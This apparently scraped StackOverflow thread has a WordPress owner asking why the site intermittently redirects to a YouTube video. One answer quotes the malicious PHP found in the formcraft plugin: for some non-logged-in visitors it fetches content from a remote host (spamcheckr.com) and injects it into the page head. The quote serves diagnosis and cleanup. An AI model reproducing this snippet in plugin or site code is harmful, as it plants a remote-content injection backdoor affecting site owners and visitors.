WordPress blog infected with HTML Refresh meta tag

wordpress redirect virus
Chris K picture Chris K · Apr 7, 2014 · Viewed 9.9k times · Source

Hello StackOverflow community. I have a very interesting (at my opinion) infection to share with you today.

4-5 days ago I realized that my blog's homepage after some seconds of loading was redirected to another page. Specifically to youtube, at a Justin Bieber video. I thought it was my computer's problem, so I scanned or viruses and malware. But it wasn't my fault.

Finally I was sure that it was not a local problem because Google pagespeed insights had the same result.

So, after many hours of research (and some broken keyboards) I found out those clues. In details:

A meta tag was created inside my header similar to this:

<meta http-equiv="refresh" content="0; url=http://www.youtube.com/watch?v=RFngSCaY5nA">

First, I disabled all my plugins but without result. After a while the problem was still there. Second, I searched all my database tables to find out if the URL of the video was included somewhere, but it wasn't. Then I searched in my template editor one by one the php files, but nothing. .htaccess was also clear (not 100% sure what I was looking for in there, but I think there was nothing suspicious).

After all these, I downloaded via FTP my whole site, and searched inside every file for this URL. I found that it was included to some HTML files of the CACHE folder. I use W3 Total Cache for that purpose. I deleted the whole cache folder, but after a while the problem was still there.

The fun fact here is that this "virus" is not always active. It appears at random time, at different page each time. Also tonight I realized that it appeared on a second computer, the same time that everything looked fine on my computer.

The Youtube Video URL is: http:// www.youtube.com/watch?v=RFngSCaY5nA

So my question is: Does anyone of you have a solution to recommend before deleting the whole installation and start from the beginning? Does anyone else had the same problem wit me in the past?

I think that's all l have to share. I'm sorry for the long post, tried to be as detailed as possible. I'm not good at coding, this is my first attempt to run a WordPress site so, there might be something that I forgot.

Thanks in advance.

Answer

Sys Ripper picture Sys Ripper · Apr 8, 2014

I have the same problem and think I found the solution! Check your site files for this link: http://spamcheckr.com/l.php I found this link in formcraft plugin.

Like this:

if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}

Edited: Also check for this: http://spamcheckr.com/req.php

Related questions

Use .htaccess to redirect HTTP to HTTPs

Please, don't recommend me the long and very detailed thread with more than 173 upvotes. It didn't work for me. I have also tried many others (1, 2, 3, 4). They all give me TOO_MANY_REDIRECTS or error 500. So, here is my issue: With …

Read More
Redirect after Login on WordPress

I'm creating a customized WordPress theme based on an existing site. I want to use an alternate dashboard which I have created. How can I have the user directed to 'news.php' after login instead of '/wp-admin/' ? -- …

Read More
Why does my page redirect to localhost in my wordpress blog?

This is my site URL http://www.weblogicsol.com/ , Here I installed a wordpress theme having URL http://www.weblogicsol.com/blog , the problem is this when I want to open the wp-admin (means when I write http://www.weblogicsol.…

Read More